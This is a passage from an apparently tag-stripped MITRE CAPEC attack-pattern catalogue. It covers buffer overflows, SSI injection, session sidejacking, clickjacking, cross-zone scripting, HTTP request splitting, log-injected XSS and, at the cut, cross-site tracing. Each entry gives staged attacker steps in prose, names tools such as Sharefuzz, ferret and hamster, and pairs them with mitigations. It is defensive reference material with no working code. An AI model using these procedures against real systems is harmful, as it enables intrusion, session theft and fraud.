TERM environmental variable. CVE-1999-0046 Low An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS. High Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level. While interacting with a system an attacker would typically investigate for environment variables that can be overwritten. The more a user knows about a system the more likely she will find a vulnerable environment variable. On a web environment, the attacker can read the client side code and search for environment variables that can be overwritten. There are tools such as Sharefuzz [R.10.3] which is an environment variable fuzzer for Unix that supports loading a shared library. Attackers can use such tools to uncover a buffer overflow in an environment variable. If the application does bound checking, it should fail when the data source is larger than the size of the destination buffer. If the application's code is well written, that failure should trigger an alert. Do not expose environment variable to the user. Do not use untrusted data in your environment variables. Use a language or compiler that performs automatic bounds checking There are tools such as Sharefuzz [R.10.3] which is an environment variable fuzzer for Unices that support loading a shared library. You can use Sharefuzz to determine if you are exposing an environment variable vulnerable to buffer overflow. Availability DoS: crash / exit / restart Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Confidentiality Read memory Integrity Modify memory Confidentiality Access_Control Authorization Gain privileges / assume identity The user modifiable environment variable. User supplied data potentially containing malicious code. When the subroutine which uses the environment variable returns control to the main program, it jumps to the return address portion of the stack frame. Unfortunately that return address may have been overwritten by the overflowed buffer and the address may contain a call to a privileged command or to a malicious code. The most common is remote code execution. 120 Targeted 302 Targeted 118 Targeted 119 Targeted 74 Targeted 99 Targeted 20 Targeted 680 Targeted 733 Secondary 697 Targeted 1000 Attack Pattern ChildOf 77 1000 Attack Pattern ChildOf 100 333 Category HasMember 340 Reluctance to trust Bound checking should be performed when copying data to a buffer. Penetration High High High All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 Common Weakness Enumeration (CWE) CWE-119: Buffer Errors Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/119.html Sharefuzz http://sharefuzz.sourceforge.net [R.10.1][REF-2] Cigital, Inc 2007-03-01 [R.10.1][REF-2] Cigital, Inc 2007-03-01 Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback MITRE Content Team MITRE 2013-06-21 Updated Description, Skill_or_Knowledge_Level, Skill_or_Knowledge_Type, and Solution_or_Mitigation Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2013-12-18 Updated Indicators-Warnings_of_Attack CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Probing_Techniques, Solutions_and_Mitigations Buffer Overflow attacks target improper or missing bounds checking on buffer operations, typically triggered by input injected by an attacker. As a consequence, an attacker is able to write past the boundaries of allocated buffer regions in memory, causing a program crash or potentially redirection of execution as per the attackers' choice. The attacker identifies a buffer to target. Buffer regions are either allotted on the stack or the heap, and the exact nature of attack would vary depending on the location of the buffer Next, the attacker identifies an injection vector to deliver the excessive content to the targeted buffer. The attacker crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the attacker will craft a set of content that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the attackers' choosing which points to code injected by the attacker. The attacker injects the content into the targeted software. Upon successful exploitation, the system either crashes or control of the program is returned to a location of the attackers' choice. This can result in execution of arbitrary code or escalated privileges, depending upon the exploited target. Targeted software performs buffer operations. Targeted software inadequately performs bounds-checking on buffer operations. Attacker has the capability to influence the input to buffer operations. Very High High Injection Analysis The most straightforward example is an application that reads in input from the user and stores it in an internal buffer but does not check that the size of the input data is less than or equal to the size of the buffer. If the user enters excessive length data, the buffer may overflow leading to the application crashing, or worse, enabling the user to cause execution of injected code. Many web servers enforce security in web applications through the use of filter plugins. An example is the SiteMinder plugin used for authentication. An overflow in such a plugin, possibly through a long URL or redirect parameter, can allow an attacker not only to bypass the security checks but also execute arbitrary code on the target web server in the context of the user that runs the web server process. Low In most cases, overflowing a buffer does not require advanced skills beyond the ability to notice an overflow and stuff an input variable with content. High In cases of directed overflows, where the motive is to divert the flow of the program or application as per the attackers' bidding, high level skills are required. This may involve detailed knowledge of the target system architecture and kernel. None: Detecting and exploiting a buffer overflow does not require any resources beyond knowledge of and access to the target system. The attacker sends in overtly long input in variables under his control. If the target system or application handles it gracefully, the attack becomes difficult. However, an error condition or a system crash point to a high likelihood of successful exploitation. In cases where the attack is directed at a particular system or application, such as an operating system or a web server, the attacker can refer to system architecture and design documentation to figure out the exact point of injection and exploitation. An attack designed to leverage a buffer overflow and redirect execution as per the attackers' bidding is fairly difficult to detect. An attack aimed solely at bringing the system down is usually preceded by a barrage of long inputs that make no sense. In either case, it is likely that the attacker would have resorted to a few hit-or-miss attempts that will be recorded in the system event logs, if they exist. A buffer overflow attack itself is pretty difficult to obfuscate. There, however, exist fairly advanced techniques to obfuscate the payload, in order to bypass an intrusion detection system or filtering, either in the application or by means of an application firewall of some sorts. Use a language or compiler that performs automatic bounds checking. Use secure functions not vulnerable to buffer overflow. If you have to use dangerous functions, make sure that you do boundary checking. Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution. Use OS-level preventative functionality. Not a complete solution. Utilize static source code analysis tools to identify potential buffer overflow weaknesses in the software. Availability DoS: crash / exit / restart Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Confidentiality Access_Control Authorization Gain privileges / assume identity User-controllable input. Usually, any input that a user can control is prone to exploitation by overflow. Malicious content, such as an overtly long input string, system shell code or commands, intended to cause a system crash and denial of service, or to escalate privilege or execute code that results in information disclosure or system compromise. Buffer allocated in memory for the input that carried the payload. Denial of service, escalated privileges, execution of arbitrary code, including system commands and low-level assembly code. 120 Targeted 119 Secondary 131 Targeted 129 Targeted 805 Targeted 19 Secondary 680 Targeted CVE-2007-2139 Multiple stack-based buffer overflows in the SUN RPC service in CA (formerly Computer Associates) BrightStor ARCserve Media Server, as used in BrightStor ARCserve Backup 9.01 through 11.5 SP2, BrightStor Enterprise Backup 10.5, Server Protection Suite 2, and Business Protection Suite 2, allow remote attackers to execute arbitrary code via malformed RPC strings. CVE-2007-1910 Buffer overflow in wwlib.dll in Microsoft Word 2007 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted document 1000 Attack Pattern CanPrecede 24 1000 Attack Pattern ChildOf 123 333 Category HasMember 340 All user-controllable input must be strictly validated for enforcement of length and semantic checks All exception conditions (such as ArrayIndexOutOfBounds) in applications must be gracefully handled through use of available exception handling mechanisms. All applications and processes must be run with minimum privileges necessary so as to avoid an escalation of privilege in case of a successful exploit. Reluctance To Trust Defense in Depth Failing Securely Ensure that the Bounds of No Memory Region Are Violated Never Use Unvalidated Input as Part of a Directive to any Internal Component Penetration Exploitation High High High All All AJAX C C++ PERL PHP Ruby Visual Basic Other Chiradeep B. Chhaya 2007-04-30 First Draft Chiradeep B. Chhaya 2007-04-30 First Draft Sean Barnum Cigital, Inc 2007-05-02 Review and revise Sean Barnum Cigital, Inc 2007-05-02 Review and revise CAPEC Content Team MITRE 2013-12-18 Updated Obfuscation_Techniques CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Attacker_Skills_or_Knowledge_Required, Description Summary, Indicators-Warnings_of_Attack An attacker can use Server Side Include (SSI) Injection to send code to a web application that then gets executed by the web server. Doing so enables the attacker to achieve similar results to Cross Site Scripting, viz., arbitrary code execution and information disclosure, albeit on a more limited scale, since the SSI directives are nowhere near as powerful as a full-fledged scripting language. Nonetheless, the attacker can conveniently gain access to sensitive files, such as password files, and execute shell commands. Determine applicability The attacker determines whether server side includes are enabled on the target web server. Look for popular page file names. The attacker will look for .shtml, .shtm, .asp, .aspx, and other well-known strings in URLs to help determine whether SSI functionality is enabled. env-Web Fetch .htaccess file. In Apache web server installations, the .htaccess file may enable server side includes in specific locations. In those cases, the .htaccess file lives inside the directory where SSI is enabled, and is theoretically fetchable from the web server. Although most web servers deny fetching the .htaccess file, a misconfigured server will allow it. Thus, an attacker will frequently try it. env-Web If .htaccess files are used, their contents should be checked for "Options Includes" or "Options IncludesNOEXEC". env-Web If apache is used, the contents of the httpd.conf file and similar configuration files should be checked for "Options Includes" or "Options IncludesNOEXEC". env-Web IIS configurations contain server-side include compatibility. env-Web Web pages that include mundane, but dynamic information (like the current date, a file's size, or some other data that SSI can produce) might be producing that content through SSI. env-Web Adding "AllowOverrides none" to the main httpd.conf file on an server (and the similar restrictions in other application servers) can prevent unexpected loosening of SSI functionality, even by internal developers. Attempt SSI Look for user controllable input, including HTTP headers, that can carry server side include directives to the web server Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL. env-Web Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms. env-Web URL parameters are used. env-Web No parameters appear on the URL. Even though none appear, the web application may still use them if they are provided. env-Web A list of URLs, with their corresponding parameters is created by the attacker. Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application. Actively monitor the application and either deny or redirect requests from origins that appear to be automated. Inject SSI The attacker may then need to view a particular page in order to have the server execute the include directive and run a command or open a file on behalf of the attacker The attacker views data (perhaps from a file) that he normally should not see. The attacker executes a command on the server, or influences the arguments to a command executed via SSI on the server. A web server that supports server side includes and has them enabled User controllable input that can carry include directives to the web server High Very High It is fairly easy to determine whether server-side includes are permitted on the target server. An attacker can potentially glean a lot of information if SSI Injection were found to be possible. Injection Protocol Manipulation Consider a website hosted on a server that permits Server Side Includes (SSI), such as Apache with the "Options Includes" directive enabled. Whenever an error occurs, the HTTP Headers along with the entire request are logged, which can then be displayed on a page that allows review of such errors. A malicious user can inject SSI directives in the HTTP Headers of a request designed to create an error. When these logs are eventually reviewed, the server parses the SSI directives and executes them. Medium The attacker needs to be aware of SSI technology, determine the nature of injection and be able to craft input that results in the SSI directives being executed. None: Determining whether the server supports SSI does not require special tools, and nor does injecting directives that get executed. The attacker can probe for enabled SSI by injecting content that can be interpreted as SSI directives and viewing the page output Set the OPTIONS IncludesNOEXEC in the global access.conf file or local .htaccess (Apache) file to deny SSI execution in directories that do not need them All user controllable input must be appropriately sanitized before use in the application. This includes omitting, or encoding, certain characters or strings that have the potential of being interpreted as part of an SSI directive Server Side Includes must be enabled only if there is a strong business reason to do so. Every additional component enabled on the web server increases the attack surface as well as administrative overhead Confidentiality Read application data Read files or directories Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code User controllable input SSI directives that can cause disclosure of file contents or execution of commands The web server that parses and executes SSI directives before rendering the HTML page The SSI directives cause the inclusion of certain file's contents or the execution of a shell command, as directed by the attacker 97 Targeted 74 Secondary 20 Secondary 713 Secondary 1000 Category ChildOf 253 333 Category HasMember 369 Reluctance To Trust Complete Mediation Never Use Unvalidated Input as Part of a Directive to any Internal Component Penetration Exploitation High High High Client-Server SOA All All All PHP Chiradeep B. Chhaya 2007-04-20 First Draft Chiradeep B. Chhaya 2007-04-20 First Draft Sean Barnum Cigital, Inc 2007-04-20 Review and revision of content Sean Barnum Cigital, Inc 2007-04-20 Review and revision of content CAPEC Content Team MITRE 2013-12-18 Updated Attack_Phases, Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases Session sidejacking takes advantage of an unencrypted communication channel between a victim and target system. The attacker sniffs traffic on a network looking for session tokens in unencrypted traffic. Once a session token is captured, the attacker performs malicious actions by using the stolen token with the targeted application to impersonate the victim. This attack is a specific method of session hijacking, which is exploiting a valid session token to gain unauthorized access to a target system or information. Other methods to perform a session hijacking are session fixation, cross-site scripting, or compromising a user or server machine and stealing the session token. Detect Unprotected Session Token Transfer The attacker sniffs on the wireless network to detect unencrypted traffic that contains session tokens. The attacker uses a network sniffer tool like ferret or hamster to monitor the wireless traffic at a WiFi hotspot while examining it for evidence of transmittal of session tokens in unencrypted or recognizably encrypted form. An attacker applies his knowledge of the manner by which session tokens are generated and transmitted by various target systems to identify the session tokens. env-Web The attacker and the victim are both on the same WiFi network. env-Web env-ClientServer Traffic between the victim and targeted application is unencrypted. env-Web env-ClientServer The attacker sees session tokens in the unencrypted traffic Capture session token The attacker uses sniffing tools to capture a session token from traffic. Insert captured session token The attacker attempts to insert a captured session token into communication with the targeted application to confirm viability for exploitation. Session Token Exploitation The attacker leverages the captured session token to interact with the targeted application in a malicious fashion, impersonating the victim. Utilize end to end encrypted communication via a secure tunneling protocol between the victim and the target system. An attacker and the victim are both using the same WiFi network. The victim has an active session with a target system. The victim is not using a secure channel to communicate with the target system (e.g. SSL, VPN, etc.) The victim initiated communication with a target system that requires transfer of the session token or the target application uses AJAX and thereby periodically "rings home" asynchronously using the session token High High Time and State Analysis Spoofing Protocol Manipulation The attacker and the victim are using the same WiFi public hotspot. When the victim connects to the hotspot, he has a hosted e-mail account open. This e-mail account uses AJAX on the client side which periodically asynchronously connects to the server side and transfers, amongst other things, the user's session token to the server. The communication is supposed to happen over HTTPS. However, the configuration in the public hotspot initially disallows the HTTPS connection (or any other connection) between the victim and the hosted e-mail servers because the victim first needs to register with the hotspot. The victim does so, but his e-mail client already defaulted to using a connection without HTTPS, since it was denied access the first time. Victim's session token is now flowing unencrypted between the victim's browser and the hosted e-mail servers. The attacker leverages this opportunity to capture the session token and gain access to the victim's hosted e-mail account. Low Easy to use tools exist to automate this attack. Low: A laptop and access to a public WiFi network. Use available tools to snoop on communications between the victim and the target system and try to capture the transmitted session token Use the captured session token to impersonate the victim on the target system to perform actions and view information on their behalf. Make sure that HTTPS is used to communicate with the target system. Alternatively, use VPN if possible. It is important to ensure that all communication between the client and the server happens via an encrypted secure channel. Modify the session token with each transmission and protect it with cryptography. Add the idea of request sequencing that gives the server an ability to detect replay attacks. Confidentiality Access_Control Authorization Gain privileges / assume identity Integrity Modify memory Confidentiality Read memory Availability DoS: crash / exit / restart DoS: instability 294 Targeted 522 Targeted 523 Targeted 319 Targeted 614 Secondary 1000 Attack Pattern ChildOf 21 Ensure that SSL is used for all communication between the client and the target system where sensitive data and/or operations are available. Ensure that session cookies are only transmitted via SSL pipes by setting the cookie's secure attribute to true. Protect Sensitive Data in Transit Exploitation High High Low Client-Server All All All Evgeny Lebanidze Cigital, Inc 2009-01-12 Initial core pattern content Evgeny Lebanidze Cigital, Inc 2009-01-12 Initial core pattern content Sean Barnum Cigital Federal, Inc. 2009-04-20 Refinement of pattern content MITRE Content Team MITRE 2013-06-21 Updated Summary Sean Barnum Cigital Federal, Inc. 2009-04-20 Refinement of pattern content CAPEC Content Team MITRE 2013-12-18 Updated Attack_Phases, Solutions_and_Mitigations In a clickjacking attack the victim is tricked into unknowingly initiating some action in one system while interacting with the UI from seemingly completely different system. While being logged in to some target system, the victim visits the attackers' malicious site which displays a UI that the victim wishes to interact with. In reality, the clickjacked page has a transparent layer above the visible UI with action controls that the attacker wishes the victim to execute. The victim clicks on buttons or other UI elements they see on the page which actually triggers the action controls in the transparent overlaying layer. Depending on what that action control is, the attacker may have just tricked the victim into executing some potentially privileged (and most certainly undesired) functionality in the target system to which the victim is authenticated. The basic problem here is that there is a dichotomy between what the victim thinks he's clicking on versus what he or she is actually clicking on. Craft a clickjacking page The attacker utilizes web page layering techniques to try to craft a malicious clickjacking page The attacker leveraged iframe overlay capabilities to craft a malicious clickjacking page env-Web The attacker leveraged Flash file overlay capabilities to craft a malicious clickjacking page env-Web The attacker leveraged Silverlight overlay capabilities to craft a malicious clickjacking page env-Web The attacker leveraged cross-frame scripting to craft a malicious clickjacking page env-Web Overlay capabilities are enabled in the browser env-Web A page is created that performs unseen actions when the user interacts with the visible UI Disable overlay functionality in the browser. This can have obvious impact on the utility of the browser with some sites and web applications. Attacker lures victim to clickjacking page Attacker utilizes some form of temptation, misdirection or coercion to lure the victim to loading and interacting with the clickjacking page in a way that increases the chances that the victim will click in the right areas. Lure the victim to the malicious site by sending the victim an e-mail with a URL to the site. env-Web Lure the victim to the malicious site by manipulating URLs on a site trusted by the victim. env-Web Lure the victim to the malicious site through a cross-site scripting attack. env-Web The victim loads the clickjacking page. Trick victim into interacting with the clickjacking page in the desired manner The attacker tricks the victim into clicking on the areas of the UI which contain the hidden action controls and thereby interacts with the target system maliciously with the victim's level of privilege. Hide action controls over very commonly used functionality. env-Web Hide action controls over very psychologically tempting content. env-Web The victim is communicating with the target application via a web based UI and not a thick client The victim's browser security policies allow at least one of the following JavaScript, Flash, iFrames, ActiveX, or CSS. The victim uses a modern browser that supports UI elements like clickable buttons (i.e. not using an old text only browser) The victim has an active session with the target system. The target system's interaction window is open in the victim's browser and supports the ability for initiating sensitive actions on behalf of the user in the target system High Medium Spoofing Social Engineering A victim has an authenticated session with a site that provides an electronic payment service to transfer funds between subscribing members. At the same time, the victim receives an e-mail that appears to come from an online publication to which he or she subscribes with links to today's news articles. The victim clicks on one of these links and is taken to a page with the news story. There is a screen with an advertisement that appears on top of the news article with the 'skip this ad' button. Eager to read the news article, the user clicks on this button. Nothing happens. The user clicks on the button one more time and still nothing happens. In reality, the victim activated a hidden action control located in a transparent layer above the 'skip this ad' button. The ad screen blocking the news article made it likely that the victim would click on the 'skip this ad' button. Clicking on the button, actually initiated the transfer of $1000 from the victim's account with an electronic payment service to an attacker's account. Clicking on the 'skip this ad' button the second time (after nothing seemingly happened the first time) confirmed the transfer of funds to the electronic payment service. High Crafting the proper malicious site and luring the victim to this site are not trivial tasks. Low: A computer connected to the internet. If using the Firefox browser, use the NoScript plug-in that will help forbid iFrames. Turn off JavaScript, Flash and disable CSS. When maintaining an authenticated session with a privileged target system, do not use the same browser to navigate to unfamiliar sites to perform other activities. Finish working with the target system and logout first before proceeding to other tasks. Confidentiality Access_Control Authorization Gain privileges / assume identity Integrity Modify application data Modify files or directories Modify memory Confidentiality Read application data Read memory Read files or directories Availability DoS: crash / exit / restart DoS: instability 693 Targeted 1000 Attack Pattern ChildOf 173 Enforce maximum security restrictions in the browser: JavaScript disabled, Flash disabled, CSS disabled, iFrames forbidden Shed elevated privileges as soon as possible (i.e. log out of the target application once finished with it and before doing other things in the browser) Exploitation High High Low Client-Server All All All Evgeny Lebanidze Cigital, Inc 2009-01-14 Initial core pattern content Evgeny Lebanidze Cigital, Inc 2009-01-14 Initial core pattern content Sean Barnum Cigital Federal, Inc. 2009-04-20 Refinement of pattern content Sean Barnum Cigital Federal, Inc. 2009-04-20 Refinement of pattern content CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Description Summary, Examples-Instances An attacker is able to cause a victim to load content into their web-browser that bypasses security zone controls and gain access to increased privileges to execute scripting code or other web objects such as unsigned ActiveX controls or applets. This is a privilege elevation attack targeted at zone-based web-browser security. In a zone-based model, pages belong to one of a set of zones corresponding to the level of privilege assigned to that page. Pages in an untrusted zone would have a lesser level of access to the system and/or be restricted in the types of executable content it was allowed to invoke. In a cross-zone scripting attack, a page that should be assigned to a less privileged zone is granted the privileges of a more trusted zone. This can be accomplished by exploiting bugs in the browser, exploiting incorrect configuration in the zone controls, through a cross-site scripting attack that causes the attackers' content to be treated as coming from a more trusted page, or by leveraging some piece of system functionality that is accessible from both the trusted and less trusted zone. This attack differs from "Restful Privilege Escalation" in that the latter correlates to the inadequate securing of RESTful access methods (such as HTTP DELETE) on the server, while cross-zone scripting attacks the concept of security zones as implemented by a browser. Find systems susceptible to the attack Find systems that contain functionality that is accessed from both the internet zone and the local zone. There needs to be a way to supply input to that functionality from the internet zone and that original input needs to be used later on a page from a local zone. Leverage knowledge of common local zone functionality on targeted platforms to guide attempted injection of code through relevant internet zone mechanisms. In some cases this may be due to standard system configurations enabling shared functionality between internet and local zones. The attacker can search for indicators that these standard configurations are in place. env-Web Ensure standard system configurations do not enable shared functionality between internet and local zones Find the insertion point for the payload The attacker first needs to find some system functionality or possibly another weakness in the system (e.g. susceptibility to cross site scripting) that would provide the attacker with a mechanism to deliver the payload (i.e. the code to be executed) to the user. The location from which this code is executed in the user's browser needs to be within the local machine zone. Finding weaknesses in functionality used by both privileged and unprivileged users. env-Web Craft and inject the payload Develop the payload to be executed in the higher privileged zone in the user's browser. Inject the payload and attempt to lure the victim (if possible) into executing the functionality which unleashes the payload. The attacker makes it as likely as possible that the vulnerable functionality into which he has injected the payload has a high likelihood of being used by the victim. env-Web Leverage cross-site scripting vulnerability to inject payload. env-Web The target must be using a zone-aware browser. High Medium Analysis Injection There was a cross zone scripting vulnerability discovered in Skype that allowed one user to upload a video with a maliciously crafted title that contains a script. Subsequently, when the victim attempts to use the "add video to chat" feature on attacker's video, the script embedded in the title of the video runs with local zone privileges. Skype is using IE web controls to render internal and external HTML pages. "Add video to chat" uses these web controls and they are running in the Local Zone. Any user who searched for the video in Skype with the same keywords as in the title field, would have the attackers' code executing in their browser with local zone privileges to their host machine (e.g. applications on the victim's host system could be executed). Medium Ability to craft malicious scripts or find them elsewhere and ability to identify functionality that is running web controls in the local zone and to find an injection vector into that functionality No specialized equipment is needed Disable script execution. Ensure that sufficient input validation is performed for any potentially untrusted data before it is used in any privileged context or zone Limit the flow of untrusted data into the privileged areas of the system that run in the higher trust zone Limit the sites that are being added to the local machine zone and restrict the privileges of the code running in that zone to the bare minimum Ensure proper HTML output encoding before writing user supplied data to the page Integrity Modify application data Modify files or directories Modify memory Confidentiality Read application data Read files or directories Read memory Confidentiality Access_Control Authorization Gain privileges / assume identity Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code 250 Targeted 638 Targeted 285 Targeted 116 Secondary 20 Secondary 1000 Category ChildOf 233 Enforce least privilege Reluctance to trust Exploitation High High High n-Tier All All All Evgeny Lebanidze Cigital, Inc 2009-01-12 Initial core pattern content Evgeny Lebanidze Cigital, Inc 2009-01-12 Initial core pattern content Sean Barnum Cigital Federal, Inc. 2009-04-20 Refinement of pattern content Sean Barnum Cigital Federal, Inc. 2009-04-20 Refinement of pattern content CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Description Summary, Examples-Instances HTTP Request Splitting (also known as HTTP Request Smuggling) is an attack pattern where an attacker attempts to insert additional HTTP requests in the body of the original (enveloping) HTTP request in such a way that the browser interprets it as one request but the web server interprets it as two. There are several ways to perform HTTP request splitting attacks. One way is to include double Content-Length headers in the request to exploit the fact that the devices parsing the request may each use a different header. Another way is to submit an HTTP request with a "Transfer Encoding: chunked" in the request header set with setRequestHeader to allow a payload in the HTTP Request that can be considered as another HTTP Request by a subsequent parsing entity. A third way is to use the "Double CR in an HTTP header" technique. There are also a few less general techniques targeting specific parsing vulnerabilities in certain web servers. Investigate Target Environment Determine the technologies used in the target environment such as types of browsers, web servers, application firewalls, proxies, etc. Investigation of the target environment to determine the types of technologies used to parse the incoming HTTP requests. Attempt to understand how HTTP Request headers are parsed env-Web Post a malicious HTTP Request Post a malicious HTTP request that will be interpreted as multiple HTTP requests when parsed on the server Post a malicious HTTP Request utilizing double CR/LF characters in HTTP header to cause request splitting env-Web Post a malicious HTTP Request utilizing "Transfer Encoding: chunked" in the request header to cause request splitting env-Web Post a malicious HTTP Request utilizing double Content-Length headers to cause request splitting env-Web User-manipulateable HTTP Request headers are processed by the web server High Medium Protocol Manipulation Injection Analysis Microsoft Internet Explorer versions 5.01 SP4 and prior, 6.0 SP2 and prior, and 7.0 contain a vulnerability that could allow an unauthenticated, remote attacker to conduct HTTP request splitting and smuggling attacks. The vulnerability is due to an input validation error in the browser that allows attackers to manipulate certain headers to expose the browser to HTTP request splitting and smuggling attacks. Attacks may include cross-site scripting, proxy cache poisoning, and session fixation. In certain instances, an exploit could allow the attacker to bypass web application firewalls or other filtering devices. Microsoft has confirmed the vulnerability and released software updates Medium Good understanding of the HTTP protocol and the parsing mechanisms employed by various web servers Low: No specialized equipment is needed Issue HTTP Requests against a target server and examine responses. Make sure to install the latest vendor security patches available for the web server. If possible, make use of SSL. Install a web application firewall that has been secured against HTTP Request Splitting Use web servers that employ a tight HTTP parsing process Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Confidentiality Access_Control Authorization Gain privileges / assume identity Confidentiality Read application data Integrity Modify application data 436 Targeted 444 Secondary 1000 Attack Pattern ChildOf 220 333 Category HasMember 357 System integration testing must include security checks to protect against Multiple Interpretation Errors across systems. Economy of Mechanism Secure the Weakest Link Compartmentalization Defense in Depth Understand the possible underlying weaknesses in the third party technologies being used and stay up to date with the vendor patches. Exploitation Medium Medium Low Client-Server All All All Evgeny Lebanidze Cigital, Inc 2009-01-12 Initial core pattern content Evgeny Lebanidze Cigital, Inc 2009-01-12 Initial core pattern content Sean Barnum Cigital Federal, Inc. 2009-04-20 Refinement of pattern content Sean Barnum Cigital Federal, Inc. 2009-04-20 Refinement of pattern content CAPEC Content Team MITRE 2014-02-06 Updated Attack_Prerequisites, Description Summary An attacker may leverage a system weakness where logs are susceptible to log injection to insert scripts into the system's logs. If these logs are later viewed by an administrator through a thin administrative interface and the log data is not properly HTML encoded before being written to the page, the attackers' scripts stored in the log will be executed in the administrative interface with potentially serious consequences. This attack pattern is really a combination of two other attack patterns: log injection and stored cross site scripting. Probe for log injection vulnerability The attacker probes all user-controllable data inputs to the system to probe for log injection vulnerabilities. This may be difficult (unless the attacker has a white box view of the system) because there may not be a feedback event to indicate to the attacker that certain information is being logged. User injected input shows up in the logs Apply appropriate input validation and filtering of user-controllable input before writing to logs Probe for cross-site scripting vulnerability The attacker probes all user-controllable data inputs to the system to probe for any cross-site scripting vulnerabilities. Cross-site scripting vulnerabilities identified anywhere in the application indicate an increased potential that such vulnerabilities may exist in the log management portions of the application. Attacker-injected script is executed in user's browser. HTML encode all log contents before displaying in log management interfaces. Confirm exploitability Create a simple script and inject it into one of the potentially vulnerable fields. This script should take some action which will give an attacker an indication that the attack vector exists. The idea is to receive some sort of a feedback event that confirms that an attack is succeeding. That is done with a simple script prior to crafting possibly a more complex script to launch an actual attack. env-Web Expected script execution feedback event is observed. Inject System Logs with Malicious Scripts Create a malicious script to run in the administrator's web based interface and inject it in the system's logs through one of the user controlled fields that are being logged. Inject the vulnerable fields by tampering with their values to contain the malicious scripts. Possibly trigger another event that makes it more likely that injected logs are viewed in the vulnerable UI as soon as possible. env-Web The system uses a web based interface The system does not cleanse / validate user supplied data before writing it to logs Information from logs is displayed in a web based interface The web based log interface does not HTML output encode the log data prior to displaying it in the administrator console. High Medium Injection An attacker determines that a particular system uses a web based interface for administration. The attacker creates a new user record and supplies a malicious script in the user name field. The script will steal the administrator's authentication cookie and forward it to a site controlled by the attacker. The user name field is not validated by the system and is logged as is in the log. At some point later, an administrator reviews the log activity in the administrative console. When the administrator comes across the attackers' activity record, the malicious script is executed in the context of the attackers' browser, stealing the administrator's authentication cookie and forwarding it to the attacker. An attacker then uses the received authentication cookie to log in to the system as an administrator, assuming that the administrator console can be accessed remotely. Low Requires to ability to write a simple script and try to inject it through various user controlled fields in the system. No specialized hardware is required Locate system screens for operations that are likely to be logged and use these as starting points for injection Cleanse all user supplied data before placing it in the logs. Reject all bad data. Ensure that the data is in the expected form. Use proper HTML output encoding techniques to strip the log data of potentially dangerous scripting characters before displaying it in the administrative console If possible, disable script execution in the administrative interface. Confidentiality Read application data Read files or directories Confidentiality Authorization Access_Control Gain privileges / assume identity Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Integrity Modify memory Modify files or directories Modify application data 79 Targeted 117 Targeted 74 Secondary 20 Secondary 1000 Attack Pattern ChildOf 93 Log injection attack pattern is one of the components of the current attack pattern 1000 Attack Pattern ChildOf 63 Script injection attack pattern is one of the components of the current attack pattern 1000 Attack Pattern ChildOf 18 HTML output encode all data prior to writing to an HTML page Properly validate and cleanse/reject user supplied data before writing it to log files Reluctance to Trust Defense in Depth Exploitation High High Medium Client-Server n-Tier SOA All All All Evgeny Lebanidze Cigital, Inc 2009-01-12 Initial core pattern content Evgeny Lebanidze Cigital, Inc 2009-01-12 Initial core pattern content Sean Barnum Cigital Federal, Inc. 2009-04-20 Refinement of pattern content Sean Barnum Cigital Federal, Inc. 2009-04-20 Refinement of pattern content CAPEC Content Team MITRE 2014-02-06 Updated Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances Cross Site Tracing (XST) enables an attacker to steal the victim's session cookie and possibly other authentication credentials transmitted in the header of the HTTP request when the victim's browser communicates to destination system's web server. The attacker first gets a malicious script to run in the victim's browser that induces the browser to initiate an HTTP TRACE request to the web server. If the destination web server allows HTTP TRACE requests, it will proceed to return a response to the victim's web browser that contains the original HTTP request in its body. The function of HTTP TRACE, as defined by the HTTP specification, is to echo the request that the web server receives from the client back to the client. Since the HTTP header of the original request had the victim's session cookie in it, that session cookie can now be picked off the HTTP TRACE response and sent to the attackers' malicious site. XST becomes relevant when direct access to the session cookie via the "document.cookie" object is disabled with the use of httpOnly attribute which ensures that the cookie can be transmitted in HTTP requests but cannot be accessed in other ways. Using SSL does not protect against XST. If the system with which the victim is interacting is susceptible to XSS, an attacker can exploit that weakness directly to get his or her malicious script to issue an HTTP TRACE request to the destination system's web server. In the absence of an XSS 